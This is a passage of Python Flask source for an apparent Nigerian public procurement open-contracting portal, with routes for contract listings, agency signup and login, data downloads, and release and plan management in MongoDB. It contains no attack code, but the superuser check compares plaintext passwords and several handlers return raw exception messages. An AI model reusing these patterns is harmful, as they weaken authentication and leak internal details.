\"selectionmethod\": \"\",\n \"qualification\": \"\",\n \"reviewtype\": \"\"\n },\n \"scheduling\": {\n \"requestforproposalstart\": \"\",\n \"requestforproposalend\": \"\",\n \"proposaldocument\": \"\",\n \"plannedadvert\": \"\",\n \"plannedadvertend\": \"\",\n \"plannedevaluation\": \"\",\n \"plannedevaluationend\": \"\",\n \"plannedshortlistapprove\": \"\",\n \"plannedshortlistapproveend\": \"\",\n \"plannedshortlistpublish\": \"\",\n \"plannedproposalinvite\": \"\",\n \"plannedproposalinviteend\": \"\",\n \"plannedopeningoftechprop\": \"\",\n \"plannedevaluationtech\": \"\",\n \"plannedevaluationtechend\": \"\",\n \"plannedevaluationtechapprov\": \"\",\n \"plannedevaluationtechapprovend\": \"\",\n \"plannedopenfinancialprop\": \"\",\n \"plannedsubmittechreport\": \"\",\n \"plannedsubmittechreportend\": \"\",\n \"plannednegotiations\": \"\",\n \"plannednegotiationsend\": \"\",\n \"plannedprocuringenteval\": \"\",\n \"plannedprocuringentevalend\": \"\",\n \"plannedcertificateobj\": \"\",\n \"plannedcertificateobjend\": \"\",\n \"biddingdocsstart\": \"\",\n \"biddingdocsend\": \"\",\n \"biddingdocument\": \"\",\n \"plannedadvertprequal\": \"\",\n \"plannedadvertprequalend\": \"\",\n \"plannedprequalopening\": \"\",\n \"plannedevalpreqalsubm\": \"\",\n \"plannedevalpreqalsubmend\": \"\",\n \"plannedprequalapprov\": \"\",\n \"plannedprequalapprovend\": \"\",\n \"plannedprequalpublish\": \"\",\n \"plannedfirstbid\": \"\",\n \"plannedfirstbidend\": \"\",\n \"plannedsecondbid\": \"\",\n \"plannedsecondbidend\": \"\",\n \"plannedbidinvite\": \"\",\n \"plannedbidclose\": \"\",\n \"plannedbidevaluation\": \"\",\n \"plannedbidevaluationend\": \"\",\n \"plannedprocuringenteval\": \"\",\n \"plannedprocuringentevalend\": \"\",\n \"plannedcertificateobjevalreport\": \"\",\n \"plannedcertificateobjevalreportend\": \"\",\n \"plannedfecapproval\": \"\",\n \"plannedfecapprovalend\": \"\",\n \"plannedcontractoffer\": \"\",\n \"plannedcontractofferend\": \"\",\n \"plannedcontractsignature\": \"\",\n \"plannedcontractsignatureend\": \"\",\n \"plannedmobilization\": \"\",\n \"plannedmobilizationend\": \"\",\n \"plannedsubmissiondraftrep\": \"\",\n \"plannedsubmissionfinalrep\": \"\",\n \"plannedgoodsarrival\": \"\",\n \"plannedgoodsarrivalend\": \"\",\n \"plannedsubstantialcomplete\": \"\",\n \"plannedfinalaccept\": \"\",\n \"plannedfinalacceptend\": \"\"\n },\n \"publishplan\": \"\",\n \"justification\": \"\",\n \"date\": \"\",\n \"docs\": []\n },\n \"awards\": [\n {\n \"title\": description,\n \"reference\": \"\",\n \"description\": description,\n \"status\": \"\",\n \"bppcertificateofobjectionnumber\": \"\",\n \"bppcertificateofobjectiondate\": \"\",\n \"procuringentityapprovaldate\": \"\",\n \"date\": \"\",\n \"value\": {\n \"amount\": 0\n },\n \"suppliers\": [\n {\n \"identifier\": {\n \"legalName\": \"Cursor IP\"\n },\n \"additionalIdentifiers\": [\n {\n \"legalName\": \"Cursor IP\"\n }\n ],\n \"name\": \"Cursor IP\",\n \"bppNO\": \"\"\n }\n ],\n \"contractdetails\": \"\",\n\n \"contractPeriod\": {\n \"startDate\": \"13/9/2014\",\n \"endDate\": \"31/12/2015\"\n },\n \"lowestbidder\": \"\",\n \"justification\": \"\",\n \"amendment\": {\n \"date\": \"0\"\n }\n }\n ],\n \"contracts\":\n {\n \"title\": description,\n \"reference\": \"\",\n \"description\": description,\n \"status\": \"\",\n \"signeddate\": \"\",\n \"period\": {\n \"startDate\": \"13/9/2014\",\n \"endDate\": \"31/12/2015\"\n },\n \"projectlocation\": {\n \"streetaddress\": \"\",\n \"city\": \"\",\n \"state\": \"\",\n \"country\": \"\",\n \"coord\": [9.0820, 8.6753]\n },\n \"docs\": []\n ,\n \"implementation\": {\n \"amountspaid\": [],\n \"projectstatus\": \"\",\n \"finalcost\": \"\",\n \"variation\": \"\",\n \"bppapprovalvariation\": \"\",\n \"variationamount\": \"\",\n \"revisedestimatedcontractamount\": \"\",\n \"tilldate\": \"\",\n \"milestones\":\n {\n \"description\": \"0.7\",\n \"status\": \"On-Going\"\n }\n\n }\n }\n\n }\n return rl\n\n##creates an ocds formatted json data model\n\ndef past(date):\n if date==\"\":\n return False\n return date < datetime.datetime.strptime(datetime.date.today().strftime(\"%d-%m-%y\"), '%d-%m-%y').date()\n\n\napp.add_template_global(js, name='js')\napp.add_template_global(past, name='past')\napp.add_template_global(intervals, name='interval')\napp.add_template_global(repl, name='repl')\n\n\n###########################################################################################################################################################User Validation fUNCTIONS########################################################\n\n\ndef super_validate(username, password):\n\n checked = db.admins.find_one({\"username\": username, \"password\": password})\n if checked:\n return True\n else:\n return False\n\n\n# download planning document\n########################################helper functions####################################################\n\n\n###################################################################views#######################################################################'\n##displays home page##########################################################################################################\n@app.route(\"/\")\ndef home():\n c = connect_db()\n rel = c.releases.find()\n mapdata = []\n return render_template(\"index.html\", rel=rel, mapdata=json.dumps(mapdata))\n\n@app.route(\"/bids\")\n@app.route(\"/tenders\")\ndef bids():\n\n bids = db.releases.find()\n return render_template(\"listings/bids.html\", bids=bids)\n\n@app.route(\"/forcsos\")\ndef forcsos():\n\n contracts = db.releases.find()\n agency_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"buyer.identifier.legalName\", \"count\": {\"$sum\": 1}}}])\n loc_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"tender.procurementMethod\", \"count\": {\"$sum\": 1}}}])\n contractors = db.releases.aggregate([{\"$group\": {\"_id\": \"awards.$.suppliers.name\", \"count\": {\"$sum\": 1}}}])\n db.close\n return render_template(\"listings/forcsos.html\", contracts=contracts, contractors=contractors, loc=loc_freq)\n\n\n@app.route(\"/csos\")\ndef csos():\n\n csos = db.csos.find()\n db.close\n return render_template(\"listings/csos.html\", csos=csos)\n\n\n@app.route(\"/contracts\")\ndef contracts():\n\n contracts = db.releases.find()\n agency_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"buyer.identifier.legalName\", \"count\": {\"$sum\": 1}}}])\n loc_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"tender.procurementMethod\", \"count\": {\"$sum\": 1}}}])\n contractors = db.releases.aggregate([{\"$group\": {\"_id\": \"awards.$.suppliers.name\", \"count\": {\"$sum\": 1}}}])\n db.close\n return render_template(\"listings/contracts.html\", contracts=contracts, contractors=contractors, loc=loc_freq)\n\n\n@app.route(\"/contractors\")\ndef contractors():\n\n contractors = db.releases.aggregate([{\"$group\": {\n \"_id\": {\"contractor\": \"$awards.suppliers.identifier.legalName\", \"buyer\": \"$buyer.identifier.legalName\"},\n \"count\": {\"$sum\": 1},\n \"totalamount\": {\"$sum\": \"$planning.budget.amount\"}}},\n {\"$group\": {\"_id\": {\"contractor\": \"$_id.contractor\",\"buyer\": \"$_id.buyer\"},\n \"totals\": {\n \"$addToSet\": {\"buyer\": \"$_id.buyer\", \"count\": \"$count\",\n \"totalamount\": \"$totalamount\"}},\n \"count\": {\"$sum\": \"$count\"}, \"totalamount\": {\"$sum\": \"$totalamount\"}}},\n {\"$group\": {\"_id\": \"$_id.contractor\", \"buyer\": {\n \"$push\": {\"buyer\": \"$_id.buyer\", \"times\": \"$count\",\n \"total\": \"$totalamount\"}}}}, {\"$sort\": {\"buyer.times\": -1}}\n\n ])\n db.close\n\n return render_template(\"listings/contractors.html\", contractors=contractors)\n\n\n\n@app.route(\"/agencies\")\ndef agencies():\n\n\n agents= db.releases.aggregate([{\"$group\": {\"_id\": {\"buyer\":\"$buyer.identifier.legalName\", \"contractor\":\"$awards.suppliers.identifier.legalName\"}, \"count\": {\"$sum\": 1},\n \"totalamount\": {\"$sum\": \"$planning.budget.amount\"}}},\n {\"$group\":{\"_id\":{\"buyer\":\"$_id.buyer\", \"contractor\":\"$_id.contractor\"},\"totals\":{\"$addToSet\":{\"supplier\":\"$_id.contractor\",\"count\":\"$count\", \"totalamount\":\"$totalamount\"}}, \"count\":{\"$sum\":\"$count\"},\"totalamount\":{\"$sum\":\"$totalamount\"}}},\n {\"$group\":{\"_id\":\"$_id.buyer\", \"contractors\":{\"$push\":{\"contractor\":\"$_id.contractor\", \"times\":\"$count\", \"total\":\"$totalamount\"}}}}, {\"$sort\":{\"contractors.times\":-1}}\n\n ])\n\n db.close\n\n return render_template(\"listings/agencies.html\", agents=agents)\n\n\n##################################### USER AUTHENTICATION\n\n# render the signup page once a request comes to /showSignUp\n@app.route('/showSignUp')\ndef showSignUp():\n return render_template('forms/superuser.html')\n\n\n# signup method\n@app.route('/signUp', methods=['POST'])\ndef signUp():\n try:\n # read the posted values from the UI\n _ministry = request.form['ministry_name']\n _agencyName = request.form['agency_name']\n _agencyabbrev = request.form['agency_abb']\n\n _state = request.form['state']\n _city = request.form['agency_locality']\n _street = request.form['agency_street']\n _phonenum = request.form['contactphone']\n _email = request.form['contactemail']\n _fax = request.form['fax']\n _username = request.form['username']\n _password = request.form['password']\n _website = request.form['url']\n country = request.form['country']\n\n # validate the received values\n if _username and _email and _password and _ministry and _agencyName and _agencyabbrev and _state and _city and _phonenum:\n # All Good, let's call MySQL\n\n _hashed_password = generate_password_hash(_password)\n # string concatenation - \"your %s is in the %s\" % (object, location) -- add year and day of the year\n _reference = \"%s%s%s\" % (\n _agencyabbrev, datetime.date.today().strftime(\"%Y\"), datetime.date.today().strftime(\"%j\"))\n\n query = db.mdas.update_one(\n {\"agencyreference\": _reference,\n \"basicdata\": {\"ministry\": _ministry, \"agencyname\": _agencyName, \"agencyabbreviation\": _agencyabbrev},\n \"address\": {\"state\": _state, \"city\": _city, \"streetaddress\": _street, \"country\": country},\n \"contact\": {\"phone\": _phonenum, \"email\": _email, \"fax\": _fax, \"website\": _website},\n \"username\": _username, \"password\": _hashed_password},\n {\"$set\": {\"agencyreference\": _reference, \"basicdata\": {\"ministry\": _ministry, \"agencyname\": _agencyName,\n \"agencyabbreviation\": _agencyabbrev},\n \"address\": {\"state\": _state, \"city\": _city, \"streetaddress\": _street, \"country\": country},\n \"contact\": {\"phone\": _phonenum, \"email\": _email, \"fax\": _fax, \"website\": _website},\n \"username\": _username, \"password\": _hashed_password}},\n upsert=True)\n\n if query.matched_count is 0:\n\n message = \"\"\"Thanks for your registration. For your records:\n Your User Name is %s and\n your Agency Reference is %s.\"\"\".replace('\\n', ' ') % (_username, _reference)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return redirect('/registered')\n\n else:\n\n error = 'UserName or Agency Abbreviation already exists. Please review'\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/signup.html', error=error)\n else:\n error = 'Enter the required fields.'\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/signup.html', error=error)\n except Exception as e:\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n@app.route('/registered')\ndef registered():\n return render_template('dashboard/registered.html')\n\n\n# render the signup page once a request comes to /showSignin\n@app.route('/showSignin')\ndef showSignin():\n return render_template('dashboard/signin.html')\n\n\n# signin method\n@app.route('/validateLogin', methods=['POST'])\ndef validateLogin():\n try:\n _username = request.form['inputUsername']\n _password = request.form['inputPassword']\n\n query = db.mdas.find_one({\"username\": _username})\n\n\n if query and check_password_hash(query['password'], _password):\n\n # BSON TO STRING\n # populating session with user info\n session['user'] = str(query['_id'])\n\n session['username'] = query['username']\n\n session['agencyName'] = query['basicdata']['agencyname']\n\n session['reference'] = query['agencyreference']\n\n flash('You were successfully logged in')\n return redirect('/userHome')\n else:\n return render_template('dashboard/signin.html', error='Wrong UserName or Password.')\n\n\n except Exception as e:\n return render_template('dashboard/signin.html', error=str(e))\n finally:\n db.close\n\n\n#user dashboard on successful login with user id for session taken from login method\n@app.route('/userHome')\ndef userHome():\n if session.get('user'):\n return render_template('dashboard/userHome.html')\n else:\n return render_template('dashboard/error.html',error = 'Unauthorized Access')\n\n\n\n@app.route(\"/agency_registration\")\ndef agency_registration():\n return render_template(\"forms/superuser.html\")\n\n\n@app.route(\"/superuser\", methods=['GET', 'POST'])\ndef superuser():\n username = request.form['superusername']\n password = request.form['password']\n\n if username and password and super_validate(username, password):\n return render_template(\"dashboard/signup.html\")\n else:\n return render_template(\"forms/superuser.html\", error=\"Please fill in the correct details\")\n##################################### END OF USER AUTHENTICATION\n\n\n\n\n\n@app.route(\"/contact\")\ndef contact():\n return(render_template(\"forms/contact.html\"))\n\n\n@app.route(\"/messagefrom/\", methods=['GET', 'POST'])\ndef messagefrom(page):\n if request.method == 'POST':\n firstname = request.form.get('firstname', '')\n lastname = request.form.get('lastname','')\n organization = request.form.get('organization','')\n email = request.form.get('email','')\n phone = str(request.form.get('phone',''))\n subject = request.form.get('subject','').upper()\n message = request.form.get('message','')\n\n if message:\n\n msg = Message(message, sender='app@nigeriaoc.org', recipients=['app@nigeriaoc.org', 'eneyibabe@gmail.com'])\n msg.body = \"\"\"\n From: %s \\n Email: <%s>\\n To: The Public Bureau of Procurement\\n Subject: %s \\n\\n Message \\n %s\\n\\n\n Contact back Phone on : %s or by email on %s\n \"\"\" % (firstname + \" \" + lastname, email, subject, message, phone, email)\n mail.send(msg)\n flash(\"Your Enquiry has been sent. A BPP staff would be in contact with you Shortly\")\n return redirect(url_for(page))\n else:\n flash(\"You must fill in a message to send an enquiry\")\n return redirect(url_for('contact'))\n return redirect(url_for(page))\n\n\n##3DISPLAYS BPP process page\n@app.route(\"/bppprocess\")\ndef bppprocess():\n return render_template(\"displays/process.html\")\n\n\n\n###########################################################################################################################################################API########################################################\n@app.route(\"/open_api\")\n@app.route(\"/overview\")\ndef overview():\n\n contracts = db.releases.find()\n db.close\n return render_template(\"reports/overview.html\", contracts=contracts)\n\n\n \n@app.route(\"/release/\",methods=['GET', 'POST'])\ndef downloadocid(ocid):\n\n todays_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n matches = list(db.releases.find({\"ocid\":ocid}))\n for i in matches:\n i.pop(\"_id\")\n db.close\n matches = {\n \"uri\":\"http:nigeriaoc.org/releases/\"+ocid, \n \"publishedDate\":todays_date,\n \"publisher\":\n {\"scheme\":\"NGA-COH\",\n \"name\":\"Public Bureau of Procurement\",\n \"uri\":\"http://www.bpp.gov.ng\"\n \n },\n \"license\":\"https://opendatacommons.org/licenses/pddl/1.0/\",\n \"publicationPolicy\":\"https://github.co/open-contracting/sample-data/\",\n \"releases\":matches\n }\n \n return jsonify(matches)\n \n\n@app.route(\"/downloadSelected\", methods=['GET', 'POST'])\ndef downloadSelected():\n data = request.form.getlist('checks')\n format = request.form.get('options','')\n filename = 'releases' + ''.join([random.choice(\"0123455boleandgroundnutnagodennoshedadaniwazobia\") for i in range(0, 5)])\n todays_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n if format == 'csv' or format == 'allcsv':\n filename = filename+\".csv\"\n file_loc = \"/home/ubuntu/flaskapp/static/data/final1.csv\"\n with open(file_loc, \"r\") as ff:\n lines = ff.read().decode('utf-8',\"replace\")\n ff.close()\n\n if format == 'allcsv':\n response = make_response(lines.encode(\"utf-8\").strip())\n response.headers['Content-Disposition'] = 'attachment; filename=' + filename\n else:\n rows = [i for i in lines.split(\"\\n\")]\n cells = [i.split(\",\") for i in rows]\n matches = rows[0] + \"\\n\" + '\\n'.join([s for s in rows if any(ocid in s for ocid in data)])\n response = make_response(matches.encode(\"utf-8\").strip())\n response.headers['Content-Disposition'] = 'attachment; filename=' + filename\n return response\n \n else:\n\n if format == 'alljson' or (format == '' and len(data)==0):\n \n data1 = list(db.releases.find())\n elif format == '' and len(data)==0:\n return jsonify({})\n else:\n data1 = list(db.releases.find({'ocid': {'$in': data}}))\n \n for i in data1:\n i.pop(\"_id\")\n db.close\n\n matches = {\n \"uri\": \"http:nigeriaoc.org/open_api\",\n \"publishedDate\": todays_date,\n \"publisher\":\n {\"scheme\": \"NGA-COH\",\n \"name\": \"Public Bureau of Procurement\",\n \"uri\": \"http://www.bpp.gov.ng\"\n\n },\n \"license\": \"https://opendatacommons.org/licenses/pddl/1.0/\",\n \"publicationPolicy\": \"https://github.co/open-contracting/sample-data/\",\n \"releases\": data1\n }\n return jsonify(matches)\n\n\t\t\n############################################################################################################\n\n\n################################### RELEASE\n\n\n# render release form\n@app.route('/showNewRelease')\ndef showNewRelease():\n return render_template('dashboard/release.html')\n\n\n# add release method\n@app.route('/addRelease', methods=['POST'])\ndef addRelease():\n try:\n\n if session.get('user'):\n\n _website = request.form['url']\n _releasetag = request.form['tag']\n _description = request.form['description']\n\n # validate the received values\n if _releasetag and _description:\n # All Good, let's call MySQL\n\n reference = session.get('reference')\n ocds = 'OCDS'\n _releaseID = \"%s-%s-%s-%s\" % (\n ocds, datetime.date.today().strftime(\"%Y\"), reference, strftime(\"%H-%M-%S\"))\n today = datetime.date.today().strftime('%Y-%m-%d')\n username = session.get('username')\n\n _agencyname = session.get('agencyName')\n # string concatenation - \"your %s is in the %s\" % (object, location)\n query = db.releases.update_one({\n \"ocid\": _releaseID,\n \"id\": _releaseID,\n \"description\": _description,\n \"tag\": [\n _releasetag\n ],\n \"buyer\": {\n \"identifier\": {\n \"id\": _releaseID,\n \"name\": _agencyname,\n \"legalName\": _agencyname,\n \"language\": language\n }\n },\n \"website\": _website,\n \"initiationType\": '',\n \"date\": datetime.datetime.strptime(today, \"%Y-%m-%d\"),\n \"language\": language}\n ,\n {\"$set\": {\n \"ocid\": _releaseID,\n \"id\": _releaseID,\n \"description\": _description,\n \"tag\": [\n _releasetag\n ],\n \"buyer\": {\n \"identifier\": {\n \"id\": _releaseID,\n \"name\": _agencyname,\n \"legalName\": _agencyname,\n \"language\": language\n }\n },\n \"website\": _website,\n \"initiationType\": '',\n \"date\": datetime.datetime.strptime(today, \"%Y-%m-%d\"),\n \"language\": language}\n }\n ,\n upsert=True)\n\n if query.matched_count is 0:\n\n message = \"\"\"Thank you %s for your creating a new project release. For your records:\n The OCID / Release Identification Number is %s and\n your Agency Reference is %s.\"\"\".replace('\\n', ' ') % (username, _releaseID, reference)\n # return json.dumps({'message':'User created successfully !'})\n\n flash(message)\n return redirect('/userHome')\n\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/release.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/release.html',\n error='Enter project description and choose a release tag/stage.')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n except Exception as e:\n return json.dumps({'error': str(e)})\n finally:\n\n db.close\n\n\n\n\n\n #############################################DATA FETCHING METHODS\n\n\n################################### START OF RELEASE MODAL\n# retrieve release method\n@app.route('/getRelease', methods=['POST'])\ndef getRelease():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n # for rel in releases:\n # print(rel['releases'])\n # for inrel in rel['releases']:\n # print(inrel['ocid'])\n\n # skip 5, limit 5\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n d = release['date']\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'Project_Description': release['description'],\n 'Release_Tag': release['tag'],\n\n 'Published_Date': dString}\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# get particular release information\n@app.route('/getReleaseById', methods=['POST'])\ndef getReleaseById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n # for rel in releases['releases']:\n # print(rel['tag'][0])\n\n\n response = []\n releases_dict = []\n\n for rel in releases:\n release_dict = {\n 'Description': rel['description'],\n 'Tag': rel['tag'][0],\n 'Website': rel['website']\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# update release\n@app.route('/updateRelease', methods=['POST'])\ndef updateRelease():\n try:\n if session.get('user'):\n _website = request.form['website']\n _description = request.form['description']\n _release_id = request.form['id']\n _tag = request.form['tag']\n\n # print(_release_id+\" --------\")\n\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\"tag.0\": _tag,\n \"description\": _description,\n \"website\": _website\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n# delete release\n@app.route('/deleteRelease', methods=['POST'])\ndef deleteRelease():\n try:\n\n if session.get('user'):\n\n _release_id = request.form['id']\n\n result = db.releases.delete_one({\"ocid\": _release_id})\n\n if result.deleted_count is 1:\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'An Error occured'})\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return json.dumps({'status': str(e)})\n finally:\n db.close\n\n\n################################### END OF RELEASE MODAL\n\n################################### PLAN\n\n\n# render planning form\n@app.route('/showNewPlan')\ndef showNewPlan():\n return render_template('dashboard/planning.html')\n\n\n# render plan view\n@app.route('/showSavedPlan')\ndef showSavedPlan():\n if session.get('user'):\n return render_template('dashboard/myplans.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n# add a new plan\n@app.route('/addPlan', methods=['POST'])\ndef addPlan():\n # preqadvertstart=request.form.get('preqadvertstart','')\n # print preqadvertstart\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n rationale = request.form.get('rationale', '')\n projdesc = request.form.get('projdesc', '')\n packagenum = request.form.get('packagenum', '')\n lot = int(request.form['lot'])\n projtype = request.form.get('projtype', '')\n contrtype = request.form.get('contrtype', '')\n\n procmethod = request.form.get('procmethod', '')\n letterofnoobj = request.form.get('letterofnoobj', '')\n appauthority = request.form.get('appauthority', '')\n selecmethod = request.form.get('selecmethod', '')\n Qualification = request.form.get('Qualification', '')\n Review = request.form.get('Review', '')\n prepbymdastart = request.form.get('prepbymdastart', '')\n prepbymdaend = request.form.get('prepbymdaend', '')\n advertstart = request.form.get('advertstart', '')\n advertend = request.form.get('advertend', '')\n leadbefliststart = request.form.get('leadbefliststart', '')\n leadbeflistend = request.form.get('leadbeflistend', '')\n mdalistapprovestart = request.form.get('mdalistapprovestart', '')\n mdalistapproveend = request.form.get('mdalistapproveend', '')\n shortlistsubmission = request.form.get('shortlistsubmission', '')\n propinvitestart = request.form.get('propinvitestart', '')\n propinviteend = request.form.get('propinviteend', '')\n techpropopen = request.form.get('techpropopen', '')\n subtechEvreportstart = request.form.get('subtechEvreportstart', '')\n subtechEvreportend = request.form.get('subtechEvreportend', '')\n mdaapptechEvreportstart = request.form.get('mdaapptechEvreportstart', '')\n mdaapptechEvreportend = request.form.get('mdaapptechEvreportend', '')\n Openingfinancialpropstart = request.form.get('Openingfinancialpropstart', '')\n evalfinproposalst = request.form.get('submissionevareportstart', '')\n evalfinproposalend = request.form.get('submissionevareportend', '')\n Negotiationsstart = request.form.get('Negotiationsstart', '')\n Negotiationsend = request.form.get('Negotiationsend', '')\n Negotiationappobjectstart = request.form.get('Negotiationappobjectstart', '')\n Negotiationappobjectstartend = request.form.get('Negotiationappobjectstartend', '')\n planndcertnoobjstart = request.form.get('planndcertnoobjstart', '')\n planndcertnoobjend = request.form.get('planndcertnoobjend', '')\n biddocstart = request.form.get('biddocstart', '')\n biddocend = request.form.get('biddocend', '')\n\n preqadvertstart = request.form.get('preqadvertstart', '')\n preqadvertend = request.form.get('preqadvertend', '')\n Prequalificationopen = request.form.get('Prequalificationopen', '')\n Prequalificationstart = request.form.get('Prequalificationstart', '')\n Prequalificationend = request.form.get('Prequalificationend', '')\n Prequalificationappobjectstart = request.form.get('Prequalificationappobjectstart', '')\n Prequalificationappobjectend = request.form.get('Prequalificationappobjectend', '')\n Prequalificationpubl = request.form.get('Prequalificationpubl', '')\n firstbidstart = request.form.get('firstbidstart', '')\n firstbidend = request.form.get('firstbidend', '')\n secondbidstart = request.form.get('secondbidstart', '')\n secondbidend = request.form.get('secondbidend', '')\n bidinvite = request.form.get('bidinvite', '')\n bidclose = request.form.get('bidclose', '')\n bidevalrepstart = request.form.get('bidevalrepstart', '')\n bidevalrepend = request.form.get('bidevalrepend', '')\n bidevalMDAstart = request.form.get('bidevalMDAstart', '')\n bidevalMDAend = request.form.get('bidevalMDAend', '')\n certnoobjectstart = request.form.get('certnoobjectstart', '')\n certnoobjectend = request.form.get('certnoobjectend', '')\n fecapprovestart = request.form.get('fecapprovestart', '')\n fecapproveend = request.form.get('fecapproveend', '')\n controfferstart = request.form.get('controfferstart', '')\n controfferend = request.form.get('controfferend', '')\n contrsignstart = request.form.get('contrsignstart', '')\n contrsignend = request.form.get('contrsignend', '')\n Mobilizationstart = request.form.get('Mobilizationstart', '')\n Mobilizationend = request.form.get('Mobilizationend', '')\n draftreptstart = request.form.get('draftreptstart', '')\n finalreptstart = request.form.get('finalreptstart', '')\n arrivalgoodsstart = request.form.get('arrivalgoodsstart', '')\n arrivalgoodsend = request.form.get('arrivalgoodsend', '')\n substcomplend = request.form.get('substcomplend', '')\n finalacceptstart = request.form.get('finalacceptstart', '')\n finalacceptend = request.form.get('finalacceptend', '')\n\n Publishplanornot = request.form.get('Publishplanornot', '')\n plsjustify = request.form.get('plsjustify', '')\n\n budgsource = request.form.get('budgsource', '')\n Budgetcode = request.form.get('Budgetcode', '')\n Budgetdesc = request.form.get('Budgetdesc', '')\n Budget = int(request.form.get('Budget', ''))\n estimatedamt = int(request.form.get('estimatedamt', ''))\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # validate ocid\n\n # check mandatory fields / basic data not null\n\n if rationale and projdesc and projtype and Budget and estimatedamt and Budgetcode and Publishplanornot:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\"planning.identity.rationale\": rationale,\n \"planning.identity.description\": projdesc,\n \"planning.identity.package\": packagenum,\n \"planning.identity.lot\": lot,\n\n \"planning.budget.project\": projdesc,\n \"planning.budget.description\": projdesc,\n\n \"planning.budget.id\": ocid,\n \"planning.budget.value.currency\": 'NGN',\n\n \"planning.budget.value.description\": Budgetdesc,\n \"planning.budget.value.code\": Budgetcode,\n \"planning.budget.value.source\": budgsource,\n \"planning.budget.value.amount\": Budget,\n \"planning.budget.value.estimate\": estimatedamt,\n\n \"planning.basicdata.procurementcategory\": projtype,\n \"planning.basicdata.contracttype\": contrtype,\n \"planning.basicdata.procurementmethod\": procmethod,\n \"planning.basicdata.letterofobjection\": letterofnoobj,\n \"planning.basicdata.approvalauthority\": appauthority,\n \"planning.basicdata.selectionmethod\": selecmethod,\n \"planning.basicdata.qualification\": Qualification,\n \"planning.basicdata.reviewtype\": Review,\n \"planning.scheduling.requestforproposalstart\": parse_datetime(\n prepbymdastart),\n \"planning.scheduling.requestforproposalend\": parse_datetime(\n prepbymdaend),\n\n \"planning.scheduling.plannedadvert\": parse_datetime(\n advertstart),\n \"planning.scheduling.plannedadvertend\": parse_datetime(\n advertend),\n \"planning.scheduling.plannedevaluation\": parse_datetime(\n leadbefliststart),\n \"planning.scheduling.plannedevaluationend\": parse_datetime(\n leadbeflistend),\n \"planning.scheduling.plannedshortlistapprove\": parse_datetime(\n mdalistapprovestart),\n \"planning.scheduling.plannedshortlistapproveend\": parse_datetime(\n mdalistapproveend),\n \"planning.scheduling.plannedshortlistpublish\": parse_datetime(\n shortlistsubmission),\n \"planning.scheduling.plannedproposalinvite\": parse_datetime(\n propinvitestart),\n \"planning.scheduling.plannedproposalinviteend\": parse_datetime(\n propinviteend),\n \"planning.scheduling.plannedopeningoftechprop\": parse_datetime(\n techpropopen),\n \"planning.scheduling.plannedevaluationtech\": parse_datetime(\n subtechEvreportstart),\n \"planning.scheduling.plannedevaluationtechend\": parse_datetime(\n subtechEvreportend),\n \"planning.scheduling.plannedevaluationtechapprov\": parse_datetime(\n mdaapptechEvreportstart),\n \"planning.scheduling.plannedevaluationtechapprovend\": parse_datetime(\n mdaapptechEvreportend),\n \"planning.scheduling.plannedopenfinancialprop\": parse_datetime(\n Openingfinancialpropstart),\n \"planning.scheduling.plannedsubmittechreport\": parse_datetime(\n evalfinproposalst),\n \"planning.scheduling.plannedsubmittechreportend\": parse_datetime(\n evalfinproposalend),\n \"planning.scheduling.plannednegotiations\": parse_datetime(\n Negotiationsstart),\n \"planning.scheduling.plannednegotiationsend\": parse_datetime(\n Negotiationsend),\n \"planning.scheduling.plannedprocuringenteval\": parse_datetime(\n Negotiationappobjectstart),\n \"planning.scheduling.plannedprocuringentevalend\": parse_datetime(\n Negotiationappobjectstartend),\n \"planning.scheduling.plannedcertificateobj\": parse_datetime(\n planndcertnoobjstart),\n 